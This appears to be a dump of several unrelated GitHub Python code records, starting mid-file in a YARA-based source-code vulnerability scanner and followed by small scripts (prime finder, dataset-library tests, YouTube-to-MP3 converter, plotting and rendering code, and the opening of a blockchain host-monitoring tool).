\"\\n\" \n\tvulnerability += \"=================================================\\n\" \n\tvulnerability += lines + \"\\n\"\n\toutput.list.append(vulnerability)\n\n\ndef yara_add_vulnerability(filename, lines, matches):\n\tif (type(matches) is list ): # maches returns list \n\t\tmatch = matches[0]\n\telse:\n\t\tmatch = matches \n\n\t\n\t#exclude some vulnerabilities \n\tfor vulname in config.exclude:\n\t\tif vulname == match.rule:\n\t\t\tlogger.debug(\"EXCLUDE %s, %s\", vulname, str(config.exclude))\n\t\t\treturn \n\t\n\tlength, variable, m_string = match.strings[0]\n\tpattern = str(m_string, 'utf-8')\n\n\tvulnerability = \"\"\n\tvulnerability += \"==================================================\\n\" \n\tvulnerability += \"filename : \" + filename + \"\\n\" \n\tvulnerability += \"vulnerability : \" + match.rule + \"\\n\" \n\tvulnerability += \"matches : \" + pattern + \"\\n\" \n\tif match.tags: \n\t\tvulnerability += \"tag : \" + match.tags[0] + \"\\n\" \n\tvulnerability += \"=================================================\\n\" \n\tvulnerability += lines + \"\\n\"\n\toutput.list.append(vulnerability)\n\ndef print_output():\n\tif ( config.output) : \n\t\twith open(config.output, \"a\") as f : \n\t\t\tfor vul in Output.list :\n\t\t\t\tf.write( vul) \n\t\t\tf.close()\n\t\t\tprint(\"The result successfully saved : \" + config.output)\n\telse:\n\t\tfor vul in Output.list :\n\t\t\tprint(vul) \n\ndef import_path(path):\n\t#module_name = os.path.basename(path).replace('-', '_')\n\tmodule_name = os.path.basename(path)\n\tspec = importlib.util.spec_from_loader(\n\t\tmodule_name,\n\t\timportlib.machinery.SourceFileLoader(module_name, path)\n\t)\n\tmodule = importlib.util.module_from_spec(spec)\n\tspec.loader.exec_module(module)\n\t#sys.modules[module_name] = module\n\treturn module\n\n\ndef load_plugin() : \n\tprint (\"load plugins ...\" )\n\t\n\t# python 3.5~ \n\tif config.plugins : \n\t\tfor p in config.plugins :\n\t\t\tif p : \n\t\t\t\tpluginfile = p + \".py\"\n\t\t\t\tplugindir = os.path.join(plugin_dir, p)\n\t\t\t\tplugin_filename = os.path.join(plugindir, pluginfile)\n\t\t\t\tplugin.dic[p] = import_path(plugin_filename)\n\t\t\t\n\t\t\t\t# myplugin = plugin.dic[\"myplugin\"].MyPlugin()\n\t\t\t\t# myplugin.init() \n\t\t\t\tplugin.objs[p] = plugin.dic[p].MyPlugin() # class MyPlugin() \n\t\t\t\tplugin.objs[p].init() # MyPlugin.init()\t\t\n\n\ndef unload_plugin():\n\tif config.plugins : \n\t\tfor p in config.plugins :\n\t\t\tif p : \n\t\t\t\tplugin.objs[p].finish() # MyPlugin.finish()\t\n\n\ndef start_audit() : \n\tprint(\"start audit ...\") \n\twalk_around( config.source_directory) \n\n\ndef sequence_find( line, keyword_array):\n\tn = 0\n\tfound_count =0 \n\tkeyword_count = len(keyword_array) \n\tlogger.debug(\"search word = %s\", str(keyword_count) ) \n\tfor key in keyword_array : \n\t\tn = line.find( key, n ) \n\t\tif ( n == -1 ): # not found \n\t\t\treturn False \n\t\telse : #found \n\t\t\tfound_count = found_count+1\n\n\tif ( keyword_count == found_count ):\n\t\t\treturn True \n\telse:\n\t\treturn False \n\t\n\ndef scrap_lines(line, datafile, i):\n\tlines =\"\"\n\thead_n = i-config.head_count\n\ttail_n = i+config.tail_count+1\n\n\tif head_n > 0 :\n\t\tif tail_n < len(datafile) :\n\t\t\tj = head_n \n\t\t\tfor x in datafile[head_n:tail_n] : \n\t\t\t\tlines += str(j) + \": \" + x \n\t\t\t\tj =j +1 \n\t\telse :\n\t\t\ttail_n = len(datafile)\n\t\t\tj = head_n \n\t\t\tfor x in datafile[head_n:tail_n] : \n\t\t\t\tlines += str(j) + \": \" + x \n\t\t\t\tj =j +1\n\telse :\n\t\thead_n = 0 \n\t\tj = head_n \n\t\tfor x in datafile[head_n:tail_n] : \n\t\t\tlines += str(j) + \": \" + x \n\t\t\tj =j +1\n\t\t#lines += str(i) + \": \" + line \n\t\n\treturn lines \n\n\ndef kbdb_audit( filename) :\n\tprint(\"audit file with kbdb : \" + filename ) \n\ttry: \n\t\twith open( filename, errors='replace' ) as f :\n\t\t\ti = 0\n\t\t\tlines = \"\"\n\t\t\tdatafile = f.readlines()\n\t\t\taudititem = AuditItem() \n\t\t\taudititem.output = output\n\t\t\tAuditItem.filename = filename \n\t\t\t\n\t\t\tfor line in datafile :\n\t\t\t\t#1. general framework kbdb search\n\t\t\t\tfor item in kbdb.dic[\"items\"] : \n\t\t\t\t\tlogger.debug(\"json escape : %s\", item[\"keyword\"])\n\t\t\t\t\t#if any(x in line for x in item[\"keyword\"]):\n\t\t\t\t\t#if(sequence_find(line, item[\"keyword\"])):\n\t\t\t\t\tkey = item[\"keyword\"]\n\t\t\t\t\t#key = key.replace('\\\\\\\\','\\\\')\n\t\t\t\t\t#logger.debug(\"json escaped: \" + key)\n\t\t\t\t\tmatch = re.search(key, line)\n\t\t\t\t\tif match:\n\t\t\t\t\t\thead_n = i-config.head_count\n\t\t\t\t\t\ttail_n = i+config.tail_count+1\n\n\t\t\t\t\t\tif ( head_n > 0 and tail_n < len(datafile) ):\n\t\t\t\t\t\t\tj = head_n \n\t\t\t\t\t\t\tfor x in datafile[head_n:tail_n] : \n\t\t\t\t\t\t\t\tlines += str(j) + \": \" + x\n\t\t\t\t\t\t\t\tj =j +1 \n\t\t\t\t\t\telse : \n\t\t\t\t\t\t\tlines += str(i) + \": \" + line \n\n\t\t\t\t\t\tkabdb_add_vulnerability(filename, lines, item, match) \n\t\t\t\t\t\tlines = \"\"\n\t\t\t\t#2. plugin search \n\t\t\t\tfor p in config.plugins :\n\t\t\t\t\taudititem.lines = scrap_lines(line, datafile,i)\n\t\t\t\t\taudititem.line = line \n\t\t\t\t\taudititem.i = i \n\t\t\t\t\t\n\t\t\t\t\tplugin.objs[p].audit(audititem) # MyPlugin.audit()\t\n\t\t\t\t\t\n\t\t\t\ti = i+1 \n\texcept IOError:\n\t\tprint (\"Could not read file:\", filename)\n\n\n\n\ndef yara_audit( filename) :\n\tlogger.debug(\"[%s][%s][%s] : \" %(config.language, config.framework_name, config.view_name) + filename ) \n\ttry: \n\t\twith open( filename, errors='replace' ) as f :\n\t\t\ti = 0\n\t\t\tlines = \"\"\n\t\t\tdatafile = f.readlines()\n\t\t\taudititem = AuditItem() \n\t\t\taudititem.output = output\n\t\t\tAuditItem.filename = filename \n\t\t\t\n\t\t\tfor line in datafile :\n\t\t\t\t#0. give up when its length is over 500 characters cause cpu goes bust\n\t\t\t\tif (len(line) > LIMIT_LINE_LEN ):\n\t\t\t\t\tprint(\"failed to analysis : one line is too long ... \")\n\t\t\t\t\tcontinue \n\t\t\t\t\n\t\t\t\t#1. framework yara search\n\t\t\t\tmatches = myyara.framework_rules.match(data=line)\n\t\t\t\tif matches:\n\t\t\t\t\tlines = scrap_lines(line, datafile,i)\n\t\t\t\t\tyara_add_vulnerability(filename, lines, matches) \n\t\t\t\t\tlines = \"\"\n\n\t\t\t\t#2. language yara search\n\t\t\t\tmatches = myyara.language_rules.match(data=line)\n\t\t\t\tif matches:\n\t\t\t\t\tlines = scrap_lines(line, datafile,i)\n\t\t\t\t\tyara_add_vulnerability(filename, lines, matches) \n\t\t\t\t\tlines = \"\"\n\n\t\t\t\t#3. view yara search\n\t\t\t\tif config.view_name != \"\" :\n\t\t\t\t\tmatches = myyara.view_rules.match(data=line)\n\t\t\t\t\tif matches:\n\t\t\t\t\t\tlines = scrap_lines(line, datafile,i)\n\t\t\t\t\t\tyara_add_vulnerability(filename, lines, matches) \n\t\t\t\t\t\tlines = \"\"\n\t\t\t\t\n\t\t\t\t#3. plugin search \n\t\t\t\tif config.plugins : \n\t\t\t\t\tfor p in config.plugins :\n\t\t\t\t\t\tif p : \n\t\t\t\t\t\t\taudititem.lines = scrap_lines(line, datafile,i)\n\t\t\t\t\t\t\taudititem.line = line \n\t\t\t\t\t\t\taudititem.i = i \n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tplugin.objs[p].audit(audititem) # MyPlugin.audit()\t\n\t\t\t\t\t\n\t\t\t\ti = i+1 \n\texcept IOError:\n\t\tprint (\"Could not read file:\", filename)\n\n\nfrom tqdm import tqdm\nimport time\n\n\n\ndef walk_around(dirname):\n\tpbar = tqdm(os.walk(dirname))\n\tfor (path, dirs, files) in pbar:\n\t\t\n\t\tpbar.set_description(\"processing\")\n\t\t\n\t\t\t\t\n\t\tif (config.ignore_dirs):\n\t\t\tdirs[:] = [d for d in dirs if d not in config.ignore_dirs]\n\n\t\tfor filename in files:\t\t\n\n\t\t\tfull_filename = os.path.join(path, filename) \n\t\t\t(base, ext ) = os.path.splitext( full_filename ) \n\t\t\tif(config.ignore_files):\n\t\t\t\texclude_exts = config.ignore_files \n\t\t\telse:\n\t\t\t\texclude_exts = DEFAULT_IGNORE\n\n\t\t\tif any(x in ext for x in exclude_exts):\n\t\t\t\tcontinue \n\t\t\telse : # start audit \n\t\t\t\tlogger.debug('full filename : %s', full_filename) \n\t\t\t\t#kbdb_audit(full_filename)\n\t\t\t\tyara_audit(full_filename)\n\tpbar.close() \n\n\n\n\t\ndef main():\n\tusage = \"usage: %prog [options] args\"\n\tparser = OptionParser(usage)\n\n\tparser.add_option(\"-c\", \"--config\", dest=\"config\", help=\"set configuration file ex) -c config.json\")\n\tparser.add_option(\"-d\", \"--directory\", dest=\"directory\", help=\"set source directory ex ) -d /src\")\n\tparser.add_option(\"-l\", \"--language\", dest=\"language\", help=\"set language ex) -l php\")\n\tparser.add_option(\"-f\", \"--framework\", dest=\"framework\", help=\"set framework ex) -f laravel \")\n\tparser.add_option(\"-v\", \"--view\", dest=\"view\", help=\"set render or view ex) -v smarty\")\n\n\tgroup = OptionGroup(parser, \"Output Options\")\n\t\n\tgroup.add_option(\"-o\", \"--output\", dest=\"output\", help=\"save result into file ex) -o output.txt\")\n\tgroup.add_option(\"-e\", \"--exclude\", dest=\"exclude\", action='append', default=[], help=\"exclude some vulnerability ex) -e 'ssl_misconfiguration'\" ) \n\tgroup.add_option(\"--head\", type=\"int\", dest=\"head\", help=\"show above lines ex) --head 5\")\n\tgroup.add_option(\"--tail\", type=\"int\", dest=\"tail\", help=\"show below lines ex) --tail 5\")\n\tparser.add_option_group(group)\n\n\tgroup = OptionGroup(parser, \"Debug Options\")\n\tgroup.add_option(\"-D\", \"--debug\", dest=\"debug\", help=\"debug mode output of dbg_print\", action=\"store_true\")\n\tparser.add_option_group(group)\n\t\n\n\t(options, args) = parser.parse_args()\n\n\tif( options.debug ):\n\t\tconfig.debug_mode = True\n\t\tlogger.setLevel(logging.DEBUG)\n\n\tif (options.directory ):\n\t\t\tconfig.source_directory = options.directory \n\telse:\n\t\tif(options.config is None):\n\t\t\tparser.error(\"app source directory not defined\")\n\n\tif (options.framework):\n\t\t\tconfig.framework_name = options.framework \n\telse :\n\t\tif(options.config is None):\n\t\t\tparser.error(\"app framework name not defined\") \n\n\tif (options.language):\n\t\t\tconfig.language = options.language \n\telse :\n\t\tif(options.config is None ):\n\t\t\tparser.error(\"app language name not defined\") \n\n\tif (options.view):\n\t\t\tconfig.view_name = options.view \n\n\tif (options.output):\n\t\t\tconfig.output = options.output \n\n\tif (options.head):\n\t\t\tconfig.head_count = options.head \n\n\tif (options.tail):\n\t\t\tconfig.tail_count = options.tail \n\n\tif(options.exclude):\n\t\t\tlogger.debug(\"EXCLUDE %s\", str(options.exclude))\n\t\t\tconfig.exclude = options.exclude \n\n\tif (options.config): \n\t\tconfig.config_file = options.config \n\t\tload_config()\n\n\n\tcheck_config() \n\n\t#kbdb_load_framework()\n\tyara_load_framework() \n\n\tyara_load_language()\n\n\tyara_load_view() \n\n\tload_plugin() \n\n\tprepare_output()\n\n\tstart_audit() \n\n\tprint_output()\n\n\tunload_plugin() \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"truefinder/tonbi","sub_path":"tonbi.py","file_name":"tonbi.py","file_ext":"py","file_size_in_byte":15815,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"83"} +{"seq_id":"70757619152","text":"import sys\r\nM,N=map(int, sys.stdin.readline().rstrip().split())\r\nfor num in range(M, N+1):\r\n flag=0\r\n if num==1:\r\n continue\r\n else:\r\n for i in range(2,int(num**0.5)+1):\r\n if num%i==0:\r\n flag=1\r\n break\r\n if flag==0:\r\n print(num)","repo_name":"ChangyungKim/BOJexercise","sub_path":"백준/Silver/1929. 소수 구하기/소수 구하기.py","file_name":"소수 구하기.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12798645518","text":"import pytest\nimport numpy\nfrom pathlib import Path\nimport zipfile\nimport soundfile\nimport jbof\n\n@pytest.fixture\ndef empty_tmp_dataset(request):\n d = jbof.create_dataset('tmp', {'kind': 'dataset'})\n request.addfinalizer(lambda: jbof.delete_dataset(d))\n yield d\n\n@pytest.fixture\ndef tmp_dataset(request):\n d = jbof.create_dataset('tmp', {'kind': 'dataset'})\n request.addfinalizer(lambda: jbof.delete_dataset(d))\n e = d.add_item(name='first', metadata={'kind': 'item'})\n e.add_array('ones', numpy.ones(10), {'kind': 'ones'}, fileformat='wav', samplerate=8000)\n e.add_array('zeros', numpy.zeros(10), {'kind': 'zeros'}, fileformat='flac', samplerate=16000)\n e.add_array('ones', numpy.ones(10), {'kind': 'ones'}, fileformat='ogg', samplerate=44100)\n e.add_array('ones', numpy.ones(10), {'kind': 'ones'}, fileformat='mat')\n e = d.add_item(metadata={'kind': 'item'})\n e.add_array('twos', numpy.ones(10)*2, {'kind': 'twos'})\n yield d\n\ndef test_dataset(tmp_dataset):\n with pytest.raises(TypeError):\n d = jbof.DataSet('doesnotexist')\n d = jbof.DataSet('tmp')\n assert d.metadata == {'kind': 'dataset'}\n\ndef test_import_dataset(tmp_dataset):\n from tmp import dataset as data\n assert data._directory.absolute() == tmp_dataset._directory.absolute()\n\ndef test_items(tmp_dataset):\n items = list(tmp_dataset.all_items())\n assert tmp_dataset.has_item('first')\n assert 'first' in tmp_dataset\n assert not tmp_dataset.has_item('doesnotexist')\n assert 'doesnotexist' not in tmp_dataset\n assert tmp_dataset.get_item('first') in items\n assert len(items) == 2\n for item in items:\n assert item.metadata == {'kind': 'item'}\n\ndef test_arrays(tmp_dataset):\n visited_arrays = []\n assert tmp_dataset.get_item('first').has_array('ones')\n assert 'ones' in tmp_dataset.get_item('first')\n assert not tmp_dataset.get_item('first').has_array('doesnotexist')\n assert 'doesnotexist' not in tmp_dataset.get_item('first')\n for item in tmp_dataset.all_items():\n for name, array in item.all_arrays():\n assert numpy.all(array == {'zeros': 0, 'ones': 1, 'twos': 2}[name])\n if Path(array._filename).suffix in ['.wav', '.flac', '.ogg']:\n assert(array.metadata['samplerate'])\n else:\n assert len(array.metadata) == 1\n assert array.metadata['kind'] == name\n assert hasattr(array, '_filename')\n visited_arrays.append(name)\n assert sorted(visited_arrays) == ['ones', 'twos', 'zeros']\n\ndef test_create_existing_dataset_raises_error(empty_tmp_dataset):\n with pytest.raises(TypeError):\n jbof.create_dataset('tmp')\n\ndef test_add_existing_item_raises_error(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item({'kind': 'item1'})\n with pytest.raises(TypeError):\n empty_tmp_dataset.add_item({'kind': 'item1'})\n\ndef test_add_existing_array_raises_error(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item()\n e.add_array('tmp', [])\n with pytest.raises(TypeError):\n e.add_array('tmp', [])\n\ndef test_add_array_from_file(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item()\n numpy.save('tmp.npy', numpy.ones(5))\n e.add_array_from_file('array', 'tmp.npy')\n assert numpy.all(e.array == 1)\n assert len(e.array) == 5\n Path('tmp.npy').unlink()\n\ndef test_add_array_from_audio_file(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item()\n soundfile.write('tmp.wav', numpy.zeros(44100), 44100)\n e.add_array_from_file('array', 'tmp.wav')\n assert numpy.all(e.array == 0)\n assert len(e.array) == 44100\n assert e.array.metadata['samplerate'] == 44100\n Path('tmp.wav').unlink()\n\ndef test_audio_array(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item()\n e.add_array('array', numpy.zeros(44100), fileformat='wav', samplerate=44100)\n assert numpy.all(e.array == 0)\n assert len(e.array) == 44100\n assert e.array.metadata['samplerate'] == 44100\n\ndef test_delete_dataset():\n d = jbof.create_dataset('tmp3')\n jbof.delete_dataset(d)\n with pytest.raises(TypeError):\n d = jbof.DataSet('tmp3')\n\ndef test_delete_item(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item()\n assert len(list(empty_tmp_dataset.all_items())) == 1\n empty_tmp_dataset.delete_item(e)\n assert len(list(empty_tmp_dataset.all_items())) == 0\n\ndef test_delete_array(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item()\n a = e.add_array('tmp', [])\n assert len(list(e.all_arrays())) == 1\n e.delete_array(a)\n assert len(list(e.all_arrays())) == 0\n\ndef test_find_items(empty_tmp_dataset):\n e1 = empty_tmp_dataset.add_item(metadata={'foo': 'bar'})\n e2 = empty_tmp_dataset.add_item(metadata={'foo': 'baz', 'raz':'boo'})\n e3 = empty_tmp_dataset.add_item(metadata={'foo': 'quz'})\n assert set(empty_tmp_dataset.find_items(doesnot='exist')) == set()\n assert set(empty_tmp_dataset.find_items(foo='bar')) == {e1}\n assert set(empty_tmp_dataset.find_items(foo=['bar', 'baz'])) == {e1, e2}\n assert set(empty_tmp_dataset.find_items(foo='quz', raz='boo')) == set()\n\ndef test_hash(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item('tmp')\n e.add_array('tmp', numpy.zeros(5))\n assert '9e9d40c37dc787a96767d314434f4123' == empty_tmp_dataset.calculate_hash()\n\ndef test_readonly(tmp_dataset):\n d = jbof.DataSet(tmp_dataset._directory, readonly=True)\n with pytest.raises(RuntimeError):\n d.add_item()\n with pytest.raises(RuntimeError):\n d.delete_item(d.find_one_item())\n for item in d.all_items():\n with pytest.raises(RuntimeError):\n item.add_array('tmp', [])\n with pytest.raises(RuntimeError):\n item.add_array_from_file('tmp', 'doesnotmatter')\n with pytest.raises(RuntimeError):\n a = list(item.all_arrays())[0]\n item.delete_array(a)\n with pytest.raises(RuntimeError):\n jbof.delete_dataset(d)\n\ndef test_hdf(tmp_dataset):\n jbof.dataset_to_hdf(tmp_dataset, 'tmp.hdf')\n d = jbof.HDFDataSet('tmp.hdf')\n assert d.metadata == {'kind': 'dataset'}\n test_items(d)\n test_arrays(d)\n\n jbof.hdf_to_dataset(d, 'recreated')\n d = jbof.DataSet('recreated', readonly=False)\n assert d.metadata == {'kind': 'dataset'}\n test_items(d)\n test_arrays(d)\n\n Path('tmp.hdf').unlink()\n jbof.delete_dataset(d)\n\n\ndef test_zip(tmp_dataset):\n with zipfile.ZipFile('tmp.zip', 'w') as f:\n for filename in tmp_dataset._directory.glob('**/*'):\n f.write(filename)\n\n d = jbof.ZIPDataSet('tmp.zip')\n assert d.metadata == {'kind': 'dataset'}\n test_items(d)\n test_arrays(d)\n\n Path('tmp.zip').unlink()\n","repo_name":"bastibe/jbof","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"83"} +{"seq_id":"19689384492","text":"import os\nfrom pytube import YouTube\nfrom moviepy.editor import VideoFileClip\n\n\ndef download_video(url, output_path):\n try:\n # create YouTube object\n yt = YouTube(url)\n\n # select highest resolution stream & download mp4\n video_stream = yt.streams.filter(only_video=False, file_extension=\"mp4\").first()\n video_stream.download(output_path=output_path)\n\n return video_stream.default_filename\n\n except Exception as e:\n print(f\"Error downloading video: {str(e)}\")\n return None\n\n\ndef convert_to_mp3(input_path, output_path):\n try:\n # load mp4\n video = VideoFileClip(input_path)\n\n # convert to mp3\n audio = video.audio\n audio.write_audiofile(output_path)\n audio.close()\n\n return True\n\n except Exception as e:\n print(f\"Error converting to MP3: {str(e)}\")\n return False\n\n\nif __name__ == \"__main__\":\n\n output_dir = \"downloads\"\n\n yt_url = input(\"Enter the YouTube video URL: \")\n\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n mp4_filename = download_video(yt_url, output_dir)\n if mp4_filename is None:\n print(\"Video download failed.\")\n exit(1)\n\n mp3_filename = mp4_filename.replace(\".mp4\", \".mp3\")\n\n # set source (mp4) & target (mp3) file paths\n mp4_filepath = os.path.join(output_dir, mp4_filename)\n mp3_filepath = os.path.join(output_dir, mp3_filename)\n\n if convert_to_mp3(mp4_filepath, mp3_filepath):\n print(f\"MP3 file saved at {mp3_filepath}\")\n else:\n print(\"Conversion to MP3 failed.\")\n\n os.remove(mp4_filepath)\n","repo_name":"daniel-ferrer/YoutubeToMp3Converter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27353068141","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nepi_path = input('please input the Data for EPI.xlsx file path here: ')\nxl_file = pd.ExcelFile(epi_path)\n\ndfs = {sheet_name: xl_file.parse(sheet_name)\n for sheet_name in xl_file.sheet_names}\n\ns1 = dfs['Sheet1']\n\n\ndef to1period(period):\n return float(period/10)\n\n\ndef find_t(m, k=31.387962497709545):\n return float(np.pi*2*np.sqrt(float(m/k)))\n\n\nmass = s1['Mass (kg)']\ntrial1 = list(map(to1period, s1['Trial 1 (10)']))\ntrial2 = list(map(to1period, s1['Trial 2 (10)']))\ntrial3 = list(map(to1period, s1['Trial 3 (10)']))\navg = s1['Period Avg']\n\nequation = list(map(find_t, mass))\n\nplt.subplot(1, 2, 1)\nl1 = plt.scatter(mass, trial1, linewidth=0.1, label='trial 1')\nl2 = plt.scatter(mass, trial2, linewidth=0.1, label='trial 2')\nl3 = plt.scatter(mass, trial3, linewidth=0.1, label='trial 3')\nplt.xlabel('mass (kg)')\nplt.ylabel('oscillate period (s)')\nl4 = plt.plot(mass, avg, label='average')\nl5 = plt.plot(mass, equation, color='r', linestyle='-.', label='T=2\\u03c0 sqrt(m/k)')\nplt.grid()\nplt.legend()\n\n\ndef find_k(m, t):\n return float(m/((t/(2*np.pi))**2))\n\n\nplt.subplot(1, 2, 2)\nt1k = list(map(find_k, mass, trial1))\nt2k = list(map(find_k, mass, trial2))\nt3k = list(map(find_k, mass, trial3))\ntak = list(map(find_k, mass, avg))\nconst = np.average(tak)\n# 31.387962497709545\n\nplt.scatter(mass, t1k, linewidth=0.1, label='trial 1')\nplt.scatter(mass, t2k, linewidth=0.1, label='trial 2')\nplt.scatter(mass, t3k, linewidth=0.1, label='trial 3')\nplt.xlabel('mass (kg)')\nplt.ylabel('spring constant (N/m)')\nplt.plot(mass, tak, label='average', color='b')\nplt.axhline(y=const, color='r', linestyle='-.', label='k=m/(T/2\\u03c0)^2')\n\nplt.fill_between(mass, const, tak, color=\"cyan\", alpha=0.25)\n\nplt.legend()\n\nplt.tight_layout()\nplt.show()\n","repo_name":"messizqin/python-matplotlib-graphs","sub_path":"graph/harmonic.py","file_name":"harmonic.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"21244524676","text":"from lutes import System\nimport constants\nimport pyglet\nimport pymunk as pm\n\n\nclass BaseRenderer(System):\n def __init__(self, window):\n super().__init__(10)\n self.window = window\n\n def convert_pos_to_window(self, vec):\n (win_x, win_y) = self.window.get_size()\n x_coef = win_x/constants.FIELD_WIDTH\n y_coef = win_y/constants.FIELD_HEIGHT\n return (vec[0]*x_coef, vec[1]*y_coef)\n\n\nclass RectangleRenderer(BaseRenderer):\n def __init__(self, window):\n super().__init__(window)\n self.handled_components = [pm.Poly]\n\n def update(self, delta):\n for entity in self.entities:\n rectangle = self.manager.get_component(entity, pm.Poly)\n points = []\n for vec in rectangle.get_vertices():\n (x, y) = self.convert_pos_to_window((vec.x, vec.y))\n points.append(x)\n points.append(y)\n pyglet.graphics.draw(\n 4,\n pyglet.gl.GL_QUADS,\n ('v2f', points)\n )\n\n\nclass CircleRenderer(BaseRenderer):\n def __init__(self, window):\n super().__init__(window)\n self.handled_components = [pm.Body, pm.Circle]\n\n def update(self, delta):\n for entity in self.entities:\n position = self.manager.get_component(entity, pm.Body).position\n circle = self.manager.get_component(entity, pm.Circle)\n # 1.41 is an approximation of sqrt(2)\n (a_x, a_y) = self.convert_pos_to_window(\n (position.x - circle.radius*1.41/2,\n position.y - circle.radius*1.41/2)\n )\n (b_x, b_y) = self.convert_pos_to_window(\n (position.x - circle.radius*1.41/2,\n position.y + circle.radius*1.41/2)\n )\n (c_x, c_y) = self.convert_pos_to_window(\n (position.x + circle.radius*1.41/2,\n position.y + circle.radius*1.41/2)\n )\n (d_x, d_y) = self.convert_pos_to_window(\n (position.x + circle.radius*1.41/2,\n position.y - circle.radius*1.41/2)\n )\n pyglet.graphics.draw(\n 4,\n pyglet.gl.GL_QUADS,\n ('v2f', [a_x, a_y, b_x, b_y, c_x, c_y, d_x, d_y])\n )\n","repo_name":"greizgh/pyng","sub_path":"systems/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"3492760067","text":"import sys\nsys.stdin = open('input.txt')\n\ndef search_round(arr):\n answer = 0\n for i in range(len(arr)-n+1):\n text = ''.join(arr[i:i+n]) # i 번째 부터 n개 까지만\n if text == text[::-1]: # text 를 뒤집은 것과 같다면 회문\n answer += 1\n return answer\n\n\nT = 10\nfor tc in range(1, T+1):\n n = int(input())\n row_arr = [list(map(str, input())) for _ in range(8)]\n len_arr = len(row_arr)\n\n col_arr = []\n for i in range(len_arr):\n a = [row_arr[j][i] for j in range(len_arr)]\n col_arr.append(a)\n\n # 열 순회\n answer = 0\n for i in row_arr:\n answer += search_round(i)\n # 행 순회\n for i in col_arr:\n answer += search_round(i)\n\n print(f'#{tc} {answer}')","repo_name":"seniing/TIL","sub_path":"algorithm/SW/SW1215_회문1/1215.py","file_name":"1215.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37132178392","text":"import re\nimport os\nimport csv\nimport time\nimport pickle\nimport shutil\nimport hashlib\nimport argparse\nimport ipaddress\nfrom nacl import signing\nfrom random import choice\nfrom getpass import getuser\nfrom secrets import randbits\nfrom socket import gethostname\nfrom ipaddress import ip_address\nfrom io import BytesIO, BufferedWriter\nfrom base64 import b64encode, b64decode\nfrom pickle import dumps, dump, loads, load\nfrom subprocess import run, CalledProcessError\nfrom time import time, ctime, localtime, strftime\n\nSUPPLIERS = {'m1', 'm2', 'm4'}\nLOGFILE = 'log_m0'\nAUTHORIDGENESIS = 'm0'\nSIGNINGKEYFILEGENESIS = 'signing_key_file_m0'\nSIGNINGKEYFILEPREFIX = 'signing_key_file_'\nVERIFYKEYFILEPREFIX = 'verify_key_file_'\nBLOCKCHAINFILE = 'blockchain_pickle'\nCOMMANDTYPES = {'CmdGeneric', 'CmdPing', 'CmdNmap', 'CmdNetstat', 'CmdLast', 'CmdUfwBlock', 'CmdSshd'}\nCOMMANDTYPESLASTBLOCK = {'CmdLast', 'CmdUfwBlock', 'CmdSshd'} # knowledge of a previous block required\nASSETTYPES = {'Directory', 'FileHashOnly', 'FileWhole', 'FileWholeRemote'}\nASSETTYPESLASTBLOCK = {'Directory', 'FileWhole', 'FileWholeRemote'} # knowledge of a previous block required\n\n\nclass GenericDescriptor:\n \"\"\" Generic descriptor for class attributes\n\n Defines the private naming scheme for class attributes.\n\n \"\"\"\n def __set_name__(self, owner, attributename):\n self.public_name = attributename\n self.private_name = f'_{attributename}'\n def __get__(self, obj, objtype=None):\n value = getattr(obj, self.private_name)\n return value\n def __set__(self, obj, value):\n setattr(obj, self.private_name, value)\n\n\nclass FileSystemAssetError(Exception):\n pass\nclass DirectoryError(Exception):\n pass\nclass FileHashOnlyError(Exception):\n pass\nclass FileWholeError(Exception):\n pass\nclass readassetlistError(Exception):\n pass\nclass readcommandlistError(Exception):\n pass\nclass AssetTypeError(Exception):\n pass\nclass CommandTypeError(Exception):\n pass\nclass filehashError(Exception):\n pass\nclass dirlistingError(Exception):\n pass\nclass cmdnmapError(Exception):\n pass\nclass cmdnetstatError(Exception):\n pass\nclass cmdgenericError(Exception):\n pass\nclass verifyError(Exception):\n pass\nclass computeblocksigError(Exception):\n pass\nclass genesisError(Exception):\n pass\nclass makenextblockError(Exception):\n pass\nclass addnewblockError(Exception):\n pass\nclass verifypreviousblockhashError(Exception):\n pass\nclass cmdlastError(Exception):\n pass\nclass cmdufwblockError(Exception):\n pass\nclass cmdsshdError(Exception):\n pass\nclass summarizeblockError(Exception):\n pass\nclass checkintegrityError(Exception):\n pass\nclass blockdataError(Exception):\n pass\nclass serializeError(Exception):\n pass\nclass dirassetError(Exception):\n pass\nclass fileassetError(Exception):\n pass\nclass filewholeassetError(Exception):\n pass\nclass commandassetError(Exception):\n pass\nclass fileassethistError(Exception):\n pass\nclass dirassethistError(Exception):\n pass\nclass cmdhistError(Exception):\n pass\nclass FileWholeRemoteError(Exception):\n pass\nclass filewholeremoteError(Exception):\n pass\nclass comparehashesError(Exception):\n pass\nclass blocksbyauthorError(Exception):\n pass\nclass enumerateassetsError(Exception):\n pass\nclass assethashchangesError(Exception):\n pass\nclass dirdiffError(Exception):\n pass\nclass hashchangesError(Exception):\n pass\nclass extractallfilehashes(Exception):\n pass\n\n\nclass FileSystemAsset:\n ''' 